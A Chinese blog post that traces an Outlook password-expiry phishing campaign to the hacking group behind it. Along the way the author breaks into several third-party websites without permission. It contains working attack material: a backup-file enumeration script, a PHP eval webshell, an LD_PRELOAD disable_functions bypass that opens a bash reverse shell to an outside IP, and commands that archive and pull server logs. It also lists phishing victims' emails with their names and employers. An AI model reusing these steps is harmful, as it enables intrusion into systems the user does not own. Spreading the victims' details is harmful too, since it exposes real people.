郵件釣魚攻擊與溯源
一、前言
近日朋友收到一封來自海外的釣魚郵件委託我幫忙分析。因此我對釣魚者身份和攻擊路徑進行了一次詳細的溯源。大致摸清了攻擊者組織身份、攻擊手法以及動機。本次溯源工作主要是通過提取攻擊者控制的肉雞伺服器、網站訪問日誌、攻擊者後門特徵等。關聯分析這些日誌和特徵最終得到攻擊者的身份資訊。本文以流水賬的方式詳細記錄整個溯源過程包括分析手法和思路以供安全研究人員參考。
二、資訊收集
這是一封冒充 Microsoft Outlook WebApp 密碼過期的釣魚郵件
2.1 郵件正文
Received: from sysmailout1.platon.sk (unknown [85.248.228.17])
by bizmx16.qq.com (NewMx) with SMTP id
for <test@test.cn>; Thu, 29 Nov 2018 06:56:41 +0800
X-QQ-SPAM: true
X-QQ-FEAT: jfJxHuYZxOCSeMM7azx75jXNlqmrApsudtGuMpkas54ZAC17UV7M4b/R5+7i0
PKMg4QGPsKjsZDM+XUXd0s8kb9W0jCArNfxa3+HTU9vKECwH9fbHyzA2+de0ctDM9+ziJ5w
1BJI2Ppc9DVh5DYSq8ySLhcBVRj6sBsJefxrSztWrgzKi58wWFCv7LPgqOAXS+VVMyVipbT
fHFacZXmdB00T62nXv8xQociZvHE+8ELBoHVgcA3ZWA7p4no8o1e0Z8ShUvX2P5FwhvXPLZ
QUg8HNiMhXk5NEtQVC0Y7R9JwKV2VeKybQbg==
X-QQ-MAILINFO: Mms3jrkBGwMrz972clMUbgsPqZ0t5EGjrqWV2rMFcEfTT5Y9lunbPCtSM
4HaaK+iUBVTvuth5bvdEvVKkuiTcOnkJ0t3khnTYcRGfQmEIZI+ZrNXlT/8QxjWMjOsiHkK
yGbgfv5Gx9Qr65abnNzXymg=
X-QQ-mid: bizmx16t1543445804ti4ex7suw
X-QQ-CSender: www-data@m7web1.platon.sk
X-QQ-ORGSender: www-data@m7web1.platon.sk
X-KK-mid:bizmxp6t1543445804t9ne878su
Received: from m7web1.platon.sk (m7web1.platon.sk [85.248.229.150])
by sysmailout1.platon.sk (Postfix) with ESMTP id 8EFCC217002E
for <test@test.cn>; Wed, 28 Nov 2018 23:56:38 +0100 (CET)
Received: by m7web1.platon.sk (Postfix, from userid 33)
id 89364400A3A1; Wed, 28 Nov 2018 23:56:38 +0100 (CET)
To: test@test.cn
Subject: =?UTF-8?Q?Password_expiry_notice?=
Date: Wed, 28 Nov 2018 23:56:38 +0100
From: =?UTF-8?Q?Microsoft_Online_Services_Team?= <no-response@365.mirohaviar.sk>
Message-ID: <0a9ee06dc11866565f0302302c647c7a@www.mirohaviar.sk>
X-Priority: 3
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="us-ascii"
略...
<br>The password for the Microsoft 365 account<span style=3D"font-weight: b=
old;"> test@test.cn
</span> has
expired.<br>![mir-nc.png-57.1kB][2]
<span class=3D"Apple-converted-space"></span><br>To protect your Microsoft =
account, your existing password may cease to work
shortly.<br>
<br>
You are now required to <span class=3D"Apple-converted-space"></span><a hre=
f=3D"http://www.rosturplast.com/shells/logon.secureaccess/?ml=3Dtest@=
test.cn
"><span style=3D"font-weight: bold;">change
your password</span></a>
immediateIy.<span class=3D"Apple-converted-space"> <br>
=2E</span><br>
<a href=3D"http://www.rosturplast.com/shells/logon.secureaccess/?ml=3Dtest=@test.cn
略...
2.2 分析郵件內容
根據郵件內容得到的資訊如下
釣魚網站
www.rosturplast.com137.74.81.5 法國
釣魚連結:
http://www.rosturplast.com/shells/logon.secureaccess/?ml=test@test.cn
發件地址
no-response@365.mirohaviar.sk
服務商
Platon Technologies, s.r.o 斯洛伐克
SMTP
sysmailout1.platon.sk 85.248.228.17 斯洛伐克
三、滲透釣魚網站
3.1 漏洞分析
訪問釣魚連結一個克隆OWA修改密碼的的虛假頁面我們按照正常流程走一遍密碼隨便輸入。不出所料頁面提示密碼錯誤這麼做可以收集受害者多個密碼提高成功率仔細想想這個功能還是很貼心的。
Step 2
注入、跨站之流都是不存在的。
郵件釣魚攻擊與溯源
訪問首頁這是一家俄羅斯的塑料水管廠商攻擊者入侵了這個網站放置了釣魚頁面再通過郵件傳播。
埠掃描顯示開放了一堆埠防火牆做了策略限制。
[+] HOST: www.rosturplast.com 137.74.81.5 法國
[+] OS: Red Hat 4.8
[+] Web Server: Apache/2.4.6 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
[+] CMS: Joomla 3.3.3 Joomla!是一套海外流行的建站系統基於PHP+MySQL開發
這是一個低版本的Joomla!,joomscan掃描顯示受害網站有一堆漏洞看起來弱不禁風Getshell指日可待。
掃描發現PHPMailer RCE漏洞不過需要郵件傳送表單功能才能利用這一堆漏洞裡面看起來唯一有機會的是CVE-2016-9838Joomla! Core Remote Privilege Escalation Vulnerability然而經過測試攻擊者喪心病狂貼心的把使用者註冊頁面刪除了堵住了漏洞導致無法利用。
機智的我此時毫無辦法開始掛字典整合Joomla目錄盲掃備份檔案最後發現目標存在PhpMyAdmin後臺和一個報錯頁面頁面顯示了網站絕對路徑和疑似以日期格式生成的網站備份的檔名。
/var/www/rosturpl/data/www/rosturplast.com/rosturplast.com.2015-11-11.zip
3.2 陷入僵局
嘗試下載這個檔案http響應404。看了一下同站有多個站點但旁站滲透是個體力活國外這種典型的CloudLinux+cPanel的架構不好提權。到這一步陷入了僵局睡個午覺養養神下午繼續研究。
wget http://www.rosturplast.com/rosturplast.com.2015-11-11.zip 錯誤 404Not Found
3.3 後臺提權
不到萬不得已不從旁站和C段入手稍加思索根據報錯頁面的備份檔名格式生成日期檔案嘗試遍歷日期下載碰碰運氣。
指令碼內容
#!/bin/bash
startdate=`date -d "+0 day $1" +%Y%m%d`
enddate=`date -d "+0 day $2" +%Y%m%d`
while [[ $startdate -le $enddate ]]
do
date=$startdate
startdateother=`date -d "+0 day $date" +%Y-%m-%d`
dateother=$startdateother
url=http://www.rosturplast.com/rosturplast.com.$dateother.zip
echo "$url"
startdate=`date -d "+1 day $date" +%Y-%m-%d`
startdateother=`date -d "+1 day $date" +%Y-%m-%d`
wget $url
done
指令碼大概跑了一個下午當到達2017-08-07的時候響應200狀態碼看到rosturplast.com.2017-08-07.zip的檔案大小為177M 感覺成了解壓後果然是整站備份果然是柳暗花明又一shell。
檢視配置檔案configuration.php
得到資料庫連線資訊登入PhpMyAdmin後臺。低許可權無法直接寫shell只能修改預設密碼登入Joomla!後臺。
public $dbtype = `mysqli`;
public $host = `localhost`;
public $user = `user***`; //敏感資訊打碼
public $password = `K********6759`; //敏感資訊打碼
public $db = `rtp_com3`;
public $dbprefix = `ms8ef_`;
public $live_site = ``;
public $secret = `5qp******4zU`; //敏感資訊打碼
備份原始密文以備還原將後臺密碼修改為 test123456XYZ
http://www.rosturplast.com/administrator/
admin / test123456XYZ
登入後臺通過模板寫入WebShell
Extensions —> Template Manager —> Template —> New Files —> PHP WebSehll
這裡寫入了PHP一句話WebShell通過Cknifejava版中國菜刀對網站進行控制。
<?php @eval($_POST[`cmd`]);?>
檢視攻擊者的釣魚檔案目錄user.txt
詳細記錄了上鉤的受害者資訊
3.4 日誌分析
將網站檔案和訪問日誌下載到本地分析
[/tmp]$ tar zcvf /var/www/rosturpl/data/www/rosturplast.com/log.tar.gz/var/www/rosturpl/data/access-logs /var/www/rosturpl/data/logs/rosturplast*
[/tmp]$ tar zcvf /var/www/rosturpl/data/www/rosturplast.com/www.tar.gz --exclude=/var/www/rosturpl/data/www/rosturplast.com/www.tar.gz/var/www/rosturpl/data/www/rosturplast.com/
wget -c http://www.rosturplast.com/log.tar.gz && wget -chttp://www.rosturplast.com/www.tar.gz
root@kali /tmp gzip -d *.gz
root@kali /tmp ls -lh
總用量 22M
-rw-r----- 1 48 6313 392K 11月 30 16:19 rosturplast.com.access.log
-rw-r----- 1 48 6313 418K 11月 21 08:08 rosturplast.com.access.log-20181121
-rw-r----- 1 48 6313 315K 11月 22 08:27 rosturplast.com.access.log-20181122
-rw-r----- 1 48 6313 367K 11月 23 08:08 rosturplast.com.access.log-20181123
-rw-r----- 1 48 6313 332K 11月 24 08:20 rosturplast.com.access.log-20181124
-rw-r----- 1 48 6313 394K 11月 25 08:30 rosturplast.com.access.log-20181125
-rw-r----- 1 48 6313 217K 11月 26 08:27 rosturplast.com.access.log-20181126
-rw-r----- 1 48 6313 338K 11月 27 08:07 rosturplast.com.access.log-20181127
-rw-r----- 1 48 6313 1.8M 11月 28 08:35 rosturplast.com.access.log-20181128
-rw-r----- 1 48 6313 2.3M 11月 29 08:38 rosturplast.com.access.log-20181129
-rw-r----- 1 48 6313 6.4M 11月 30 08:38 rosturplast.com.access.log-20181130
-rw-rw---- 1 48 6313 267K 11月 30 16:00 rosturplast.com.error.log
-rw-rw---- 1 48 6313 3.8K 11月 21 03:44 rosturplast.com.error.log-20181121
-rw-rw---- 1 48 6313 1.9K 11月 21 14:43 rosturplast.com.error.log-20181122
-rw-rw---- 1 48 6313 1.9K 11月 23 02:30 rosturplast.com.error.log-20181123
-rw-rw---- 1 48 6313 5.0K 11月 24 01:46 rosturplast.com.error.log-20181124
-rw-rw---- 1 48 6313 8.3K 11月 25 02:07 rosturplast.com.error.log-20181125
-rw-rw---- 1 48 6313 2.3K 11月 26 05:05 rosturplast.com.error.log-20181126
-rw-rw---- 1 48 6313 4.1K 11月 27 05:34 rosturplast.com.error.log-20181127
-rw-rw---- 1 48 6313 550K 11月 28 08:35 rosturplast.com.error.log-20181128
-rw-rw---- 1 48 6313 6.5M 11月 29 07:51 rosturplast.com.error.log-20181129
-rw-rw---- 1 48 6313 1.4M 11月 30 08:38 rosturplast.com.error.log-20181130
用D盾掃網站檔案發現這個網站已成跑馬場。
攻擊者在shells/
目錄下放置釣魚檔案和PHP後門。
檢視哪些IP訪問了後門並統計次數
查詢攻擊者IP地址
root@kali /tmp/rosturplast.com/log grep "/shells/" * |grep "php" | awk -F ":" `{print $2}` |awk `{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}` |sort -t " " -k 1 -n -r>ip.txt
26 174.85.145.99
20 50.73.252.169
10 213.233.104.120
2 207.228.149.69
2 195.211.23.207
2 129.205.113.8
root@kali /tmp/rosturplast.com/log for line in $(<ip.txt); do curl https://ip.cn/?ip=$line ; done
IP: 174.85.145.99 來自: 美國
IP: 50.73.252.169 來自: 美國
IP: 213.233.104.120 來自: 羅馬尼亞
IP: 207.228.149.69 來自: 百慕大
IP: 195.211.23.207 來自: 俄羅斯
IP: 129.205.113.8 來自: 奈及利亞
根據後門檔名匹配Apache訪問日誌得到攻擊者的代理IP和User Agent
root@kali /tmp grep "/shells" *| grep "php" |grep "POST" |awk -F ":" `{print $2 $6}`|sort |uniq
129.205.113.8 - - [30/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
174.85.145.99 - - [27/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
207.228.149.69 - - [28/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
213.233.104.120 - - [27/Nov/2018//www.rosturplast.com/shells//bacu.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv
50.73.252.169 - - [29/Nov/2018//www.rosturplast.com/shells/config.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
通過日誌匹配郵箱並去重得到受害者郵箱地址
egrep `[0-Z_]{1,}@[0-Z]{1,}(.[0-Z]{1,})+` * | awk -F """ `{print $2}` |awk -F "HTTP"`{print $1}` |awk -F "ml=" `{print $2}` |sort |uniq
root@kali /tmp egrep `[0-Z_]{1,}@[0-Z]{1,}(.[0-Z]{1,})+` * | awk -F """ `{print $2}`|awk -F "HTTP" `{print $1}` |awk -F "ml=" `{print $2}` |sort |uniq
alexsin54@yahoo.com //攻擊者郵箱
clavenda.payman@lbdi.net //利比亞發展投行CFO
dennis@rayfields.co.za //域名失效
georges.raad@nera.net //新加坡IT基礎設施提供商員工
gthakkar@sscinc.com //美國SS&C Technologies, Inc. 印度分公司
jasonchowan223@gmail.com //攻擊者郵箱
******@******.com //同事
jiajie.lim@cimb.com //馬來西亞聯昌國際銀行員工
kohchinbeng@bdo.com.sg //新加坡立信會計師事務所員工
mayfaithlee@hotmail.com //未知
philip@beekoo.hk //深圳市很有蜂格網路科技有限公司CEO
Point72.IR@sscinc.com //美國SS&C Technologies, Inc.
shunweicapital@sscinc.com //美國SS&C Technologies, Inc.疑似順為資本
url@email.com //無效
3.5 受害者身份識別
通過搜尋引擎對這15個受害者郵箱進行身份識別。
3.5.1 alexsin54@yahoo.com / jasonchowan223@gmail.com
3.5.2 clavenda.payman@lbdi.net
Mrs. Clavenda O. PAYMAN 利比亞發展投行Liberian Bank forDevelopment and nvestment首席財務官
3.5.3 georges.raad@nera.net
疑似新加坡 Nera Telecommunications LtdIT基礎設施提供商公司員工
來源http://www.nera.net/about-us.html
3.5.4 gthakkar@sscinc.com
美國SS&C Technologies, Inc. & 印度金融服務公司 Globeop Financial Services Technologies (India) Private Limited
來源https://www.instafinancials.com/company/globeop-financial-services-india-private-limited/U67100MH2003PTC141044
3.5.5 jiajie.lim@cimb.com
馬來西亞聯昌國際銀行員工CIMB Group
來源https://www.cimb.com/en/who-we-are.html
3.5.6 kohchinbeng@bdo.com.sg
KOH CHIN BENG 新加坡立信會計師事務所員工
3.5.7 philip@beekoo.hk
深圳市很有蜂格網路科技有限公司 CEO
四、滲透郵件傳送網站
目標mirohaviar.sk 這是一個部落格網站
4.1 漏洞掃描
伺服器資訊如下:
[+] HOST: mirohaviar.sk85.248.229.150 斯洛伐克
[+] OS: Debian 7
[+] Web Server:Apache/2.2.22 PHP/5.2.6-1+lenny16
[+] CMS: Joomla 1.5
CMS漏洞掃描得到圖示的漏洞資訊經過測試全部無法利用其他埠也沒有發現可以利用的的漏洞看來攻擊者也是一個勤奮的同學入侵成功後做了相應的修復和加固看起來毫無辦法好像只能旁站或者C段滲透了。
然而有人的地方就有江湖有黑客入侵過的網站一定有後門。這類利用通用漏洞批量入侵的黑客團伙後門檔案一般都有特徵我根據前一個網站獲得的php後門檔名列表批量訪問當前網站得到了三個相同的後門檔案。
root@kali /tmp/rosturplast.com/webroot/shells md5sum *
724e7316427151ea1f449f38a28f642c 406.php
3e8a7cf7049e8b9ab8dfca7d3c827c4a aaaa
aaf775b99997c166ff45677806d809de an.php
e5c06f1f66781ba5c39d909096c4cd47 a.txt
f71ad06982064b125d155b6f601198b8 bacu.php
f2d7553b97d8e0a0258e48c3ca42a7d2 baer.php
c01a0691c484a8d00977a100d8706b50 cfg.php
e5c06f1f66781ba5c39d909096c4cd47 config.php
md5sum: logon.secureaccess: 是一個目錄
983ba05973b84e33e76916ca0dabedec new2bug.txt
1c014f955a67974dc779100c13162f1a priv8.php
2a73dda7ebb3b8d1c0d094b79623e9ff setup.php
80b5dadd0a9856f1e6d950843140d24e switch-security.php
48f50fb676028e0ae82f3f2db4e26247 unzipper.php
51f0bba7ec30b8778dca19ead016a58f webapp365.zip
58d1d66c0be0739319156702522b1b52 wso.php
相同檔名如下:
http://www.mirohaviar.sk/config.php
http://www.mirohaviar.sk/an.php
http://www.mirohaviar.sk/bacu.php Pro Mailer V2
其中 http://www.mirohaviar.sk/config.php
是攻擊者的加密WebShell理論上只需解密獲得密碼就能登入這個後門。
4.2 解密WebShell
解密過程如下:
awk -F """ `{print $2}` config.php
//去除頭尾多餘字元得到base64密文。
awk -F """ `{print $2}` config.php| base64 -d -i|awk -F """ `{print $2}` |sed`s/\x//g` |tr -d `\`
//第一次base64解碼得到16進位制密文
awk -F """ `{print $2}` config.php| base64 -d -i|awk -F """ `{print $2}` |sed`s/\x//g` |tr -d `\` |xxd -r -p
//第二次hex解碼得到base64密文
awk -F """ `{print $2}` config.php| base64 -d -i|awk -F """ `{print $2}` |sed`s/\x//g` |tr -d `\` |xxd -r -p |base64 -d -i |awk -F """ `{print $2}`
//第三次base64解碼得到base64密文
awk -F """ `{print $2}` config.php| base64 -d -i|awk -F """ `{print $2}` |sed`s/\x//g` |tr -d `\` |xxd -r -p |base64 -d -i |awk -F """ `{print $2}` |base64 -d -i|awk -F """ `{print $2}`
//第四次base64解碼得到base64密文
awk -F """ `{print $2}` config.php| base64 -d -i|awk -F """ `{print $2}` |sed`s/\x//g` |tr -d `\` |xxd -r -p |base64 -d -i |awk -F """ `{print $2}` |base64 -d -i|awk -F """ `{print $2}` |base64 -d -i
//第五次base64解碼得到明文
得到後門密碼hashMD5解密後得到明文: root 饒了個大彎原來是個弱口令下次遇到這類先跑一下密碼
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
這個後門有點皮做了UserAgent判斷我瀏覽器預設設定的UA是Googlebot訪問顯示404這是反搜尋引擎爬蟲的慣用手段所以我換了個正常瀏覽器的UA訪問得到正常頁面。
if(!empty($_SERVER[`HTTP_USER_AGENT`])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match(`/` . implode(`|`, $userAgents) . `/i`, $_SERVER[`HTTP_USER_AGENT`])) {
header(`HTTP/1.0 404 Not Found`);
exit;
}
}
4.3 提權
通過webshell得到了具體系統資訊下一步嘗試提權目的是獲得Apache的web訪問日誌。
4.3.1 突破 disable_functions
測試發現目標限制跨目錄open_basedir並禁用了命令執行函式導致WebShell許可權下無法跨目錄訪問也無法執行命令。
disable_functionsescapeshellarg,escapeshellcmd,exec,passthru,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,system,popen,pcntl_exec
open_basedir /storage/www/mirohaviar.sk/:/storage/www-include/:/usr/share/php5/:/usr/share/file/:/usr/share/pear/:/tmp/
突破的手段很多這裡我利用LD_PRELOAD動態連結來劫持php的mail函式突破disable_functions執行系統命令。
檢視sendmail函式在執行過程中動態呼叫哪些標準庫函式。
www-data@m7web1:/tmp$ readelf -Ws /usr/sbin/sendmail
Symbol table `.dynsym` contains 420 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND
1: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __printf_chk@GLIBC_2.3.4 (2)
2: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getegid@GLIBC_2.2.5 (3)
3: 0000000000000000 0 FUNC GLOBAL DEFAULT UND dane_raw_tlsa@DANE_0_0 (4)
4: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_ocsp_resp_print@GNUTLS_3_4 (5)
5: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_x509_crt_get_serial@GNUTLS_3_4 (5)
6: 0000000000000000 0 FUNC GLOBAL DEFAULT UND __errno_location@GLIBC_2.2.5 (3)
7: 0000000000000000 0 FUNC GLOBAL DEFAULT UND gnutls_db_set_cache_expiration@GNUTLS_3_4(5)
8: 0000000000000000 0 FUNC GLOBAL DEFAULT UND sendto@GLIBC_2.2.5 (3)
......
76: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getuid@GLIBC_2.2.5 (3)
77: 0000000000000000 0 FUNC GLOBAL DEFAULT UND send@GLIBC_2.2.5 (3)
從中選取geteuid函式進行測試編寫動態連結程式bypass.c
#include<stdlib.h>
#include <stdio.h>
#include<string.h>
void payload() {
system("bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/999 0>&1");
}
int geteuid() {
if(getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
當這個共享庫中的geteuid被呼叫時嘗試載入payload()函式執行命令呼叫system執行一個反彈shell的操作xxx.xxx.xxx.xxx即是我的公網伺服器IP
編譯
gcc -c -fPIC bypass.c -o bypass
gcc -shared bypass.c -o bypass.so
上傳
www-data@m7web1:/tmp$ cat b64.txt|base64 -d >bypass.so
www-data@m7web1:/tmp$ file bypass.so
file bypass.so
bypass.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV)
執行
bypass.php
<?php
putenv("LD_PRELOAD=/tmp/bypass.so");
mail("test@localhost","","","","");
?>
瀏覽器訪問http://www.mirohaviar.sk/bypass.php
頁面後成功執行命令得到了一個www-user許可權的反彈shell。
4.3.2 發現行蹤
仔細看這是一家斯洛伐克的網路公司這臺伺服器上面託管了五百多個網站當前的許可權可以訪問這些網站的檔案和資料庫令人遺憾的的是apache日誌目錄/var/log/apache2/
無許可權訪問。
不過我在/tmp
目錄下面發現了一個有趣的日誌檔案。
[/tmp/]$cat w
--2018-11-26 04:49:06-- http://187.85.134.4/cacat/mm.tgz
Connecting to 187.85.134.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 769309 (751K) [application/x-gzip]
Saving to: `mm.tgz`
0K .......... .......... .......... .......... .......... 6% 174K 4s
50K .......... .......... .......... .......... .......... 13% 176K 4s
100K .......... .......... .......... .......... .......... 19% 14.1M 2s
150K .......... .......... .......... .......... .......... 26% 353K 2s
200K .......... .......... .......... .......... .......... 33% 353K 2s
250K .......... .......... .......... .......... .......... 39% 19.8M 1s
300K .......... .......... .......... .......... .......... 46% 355K 1s
350K .......... .......... .......... .......... .......... 53% 28.7M 1s
400K .......... .......... .......... .......... .......... 59% 23.6M 1s
450K .......... .......... .......... .......... .......... 66% 344K 1s
500K .......... .......... .......... .......... .......... 73% 18.0M 0s
550K .......... .......... .......... .......... .......... 79% 360K 0s
600K .......... .......... .......... .......... .......... 86% 20.4M 0s
650K .......... .......... .......... .......... .......... 93% 20.2M 0s
700K .......... .......... .......... .......... .......... 99% 12.7M 0s
750K . 100% 2438G=1.3s
2018-11-26 04:49:10 (577 KB/s) - `mm.tgz` saved [769309/769309]
4.4 追蹤
根據洩露日誌使用谷歌搜尋關鍵字http://187.85.134.4
發現了一個歷史頁面。
這是一個已經被刪除的後門頁面剛好被谷歌爬蟲收錄了進一步搜尋一下這個後門引數的關鍵字
inurl:bc.php?filesrc=
得到了多條後門記錄。
其中多個WebShell快取頁面內容跟上一個被黑網站的臨時目錄中發現的日誌內容吻合疑似自動化攻擊留下的日誌WebShell底部署名Muslim Cyber Corp - Mujahidin Cyber Army - Family Attack Cyber
表明後門均為這個黑客組織所有。
進一步搜尋這個黑客組織名稱發現大量被黑網站程式使用Wordpress與Joomla居多。
4.5 提取日誌
我提取了其中幾個被入侵網站的訪問日誌。
4.5.1 網站www.radiolanalhue.cl
打包
tar zcvf /home/radiolanalhue/public_html/www.radiolanalhue.cl.tar.gz
--exclude=/home/radiolanalhue/public_html/www.radiolanalhue.cl.tar.gz/home/radiolanalhue/public_html/
tar zcvf /home/radiolanalhue/public_html/www.radiolanalhue.cl.log.tar.gz/home/radiolanalhue/logs/radiolanalhue.cl-ssl_log-Nov-2018.gz/home/radiolanalhue/access-logs/ /home/radiolanalhue/access-logs/radiolanalhue.cl
下載
wget -c http://www.radiolanalhue.cl/www.radiolanalhue.cl.tar.gz
wget -c http://www.radiolanalhue.cl/www.radiolanalhue.cl.log.tar.gz
分析
根據後門檔名匹配Apache訪問日誌到攻擊者代理IP和User Agent。
root@kali /tmp/radiolanalhue.cl/log/ grep "/beez5/" radiolanalhue.cl-Dec-2018
疑似攻擊者代理IP
212.1.211.3 美國 - - [30/Nov/2018:13:35:36 -0300] "GET /online/templates/beez5/bc.php HTTP/1.1" 200 16823 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
谷歌爬蟲
66.249.66.149 - - [01/Dec/2018:00:53:57 -0300] "GET /online/templates/beez5/bc.php HTTP/1.1" 200 16823 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.151 - - [01/Dec/2018:06:34:34 -0300] "GET /online/templates/beez5/bc.php?filesrc=/home/radiolanalhue/public_html/online/templates/beez5/favicon.ico&path=/home/radiolanalhue/public_html/online/templates/beez5 HTTP/1.1" 200 2348 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.153 - - [01/Dec/2018:06:51:46 -0300] "GET /online/templates/beez5/bc.php?filesrc=/home/radiolanalhue/public_html/online/templates/beez5/component.php&path=/home/radiolanalhue/public_html/online/templates/beez5 HTTP/1.1" 200 5456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
4.5.2 網站zebramedia.al
打包
tar zcvf /home/vayqpdvg/zebramedia.al/zebramedia.al-www.tar.gz --exclude=/home/vayqpdvg/zebramedia.al/zebramedia.al-www.tar.gz/home/vayqpdvg/zebramedia.al/
tar zcvf /home/vayqpdvg/zebramedia.al/zebramedia.al-log.tar.gz /home/vayqpdvg/logs
下載
wget http://zebramedia.al/zebramedia.al-log.tar.gz
wget http://zebramedia.al/zebramedia.al-www.tar.gz
-rw-r--r-- 1 1365 1328 478714 11月 30 21:15 evropakrijuese.publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 6463 11月 30 21:15 evropakrijuese.publik.live-ssl_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 1855430 6月 30 2018 ftp.publik.live-ftp_log-Jun-2018.gz
-rw-r--r-- 1 1365 1328 7899 11月 27 21:12 ftp.publik.live-ftp_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 22883767 11月 30 21:15 ief.publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 67526 11月 30 21:15 ief.publik.live-ssl_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 68187 11月 30 21:15 instadyqan.publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 34530 11月 30 21:15 instadyqan.publik.live-ssl_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 35748 11月 30 21:15 pigmentnews.publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 7709 11月 28 21:15 pigmentnews.publik.live-ssl_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 129055 11月 30 21:15 publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 14487 11月 30 21:15 publik.live-ssl_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 88292 11月 30 21:15 zebramedia.publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 139759 11月 30 21:15 zebramedia.publik.live-ssl_log-Nov-2018.gz
-rw-r--r-- 1 1365 1328 6047261 11月 30 21:15 zeri-popullit.publik.live-Nov-2018.gz
-rw-r--r-- 1 1365 1328 52004 11月 30 21:15 zeri-popullit.publik.live-ssl_log-Nov-2018.gz
分析
根據後門檔名匹配Apache訪問日誌到攻擊者代理IP和User Agent。
root@kali /tmp/zebramedia.al/log/home/vayqpdvg/logs grep "INSTALL.sql.txt.php" * |grep"php" | awk -F ":" `{print $2}` |awk `{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}`|sort |uniq
148 197.211.61.82 (奈及利亞)
8 178.128.221.199 希臘
root@kali /tmp/zebramedia.al/log/home/vayqpdvg/logs grep "INSTALL.sql.txt.php" * |grep "php" |grep "POST" |awk -F ":" `{print $2 $6}` |sort |uniq
178.128.221.199 - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
197.211.61.82 - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
4.5.2 網站helioncomposites.com
打包
日誌路徑:
/home2/helionco/access-logs/helioncomposites.com/
日誌備份:
ls /home2/helionco/logs/
ftp.helioncomposites.com-ftp_log-Feb-2018.gz
helioncomposites.com-Dec-2018.gz
helioncomposites.com-Nov-2018.gz
helioncomposites.com-ssl_log-Dec-2018.gz
helioncomposites.com-ssl_log-Nov-2018.gz
tar zcvf /home2/helionco/www/helioncomposites.com-www.tar.gz --exclude=/home2/helionco/www/helioncomposites.com-www.tar.gz /home2/helionco/www/
tar zcvf /home2/helionco/www/helioncomposites.com-log.tar.gz /home2/helionco/logs/ /home2/helionco/access-logs/helioncomposites.com/
下載
wget http://helioncomposites.com/helioncomposites.com-log.tar.gz
wget http://helioncomposites.com/helioncomposites.com-www.tar.gz
分析
根據後門檔名匹配Apache訪問日誌到攻擊者代理IP和User Agent。
root@kali /tmp grep ".php" * |grep "/home2/helionco/public_html/" |grep "HTTP/1.1" 200" |awk -F ":" `{print $2}` |awk `{a[$1]+=1;} END {for(i in a){print a[i]" "i;}}`|sort -t " " -k 1 -n -r >ip.txt
1137 198.143.51.17
588 198.143.38.3
478 198.143.41.14
246 198.143.32.13
131 198.143.32.3
103 198.143.57.3
86 198.143.57.73
84 198.143.57.5
46 198.143.32.10
32 198.143.37.15
......
root@kali /tmp for line in $(</ip.txt); do curl https://ip.cn/?ip=$line ; done
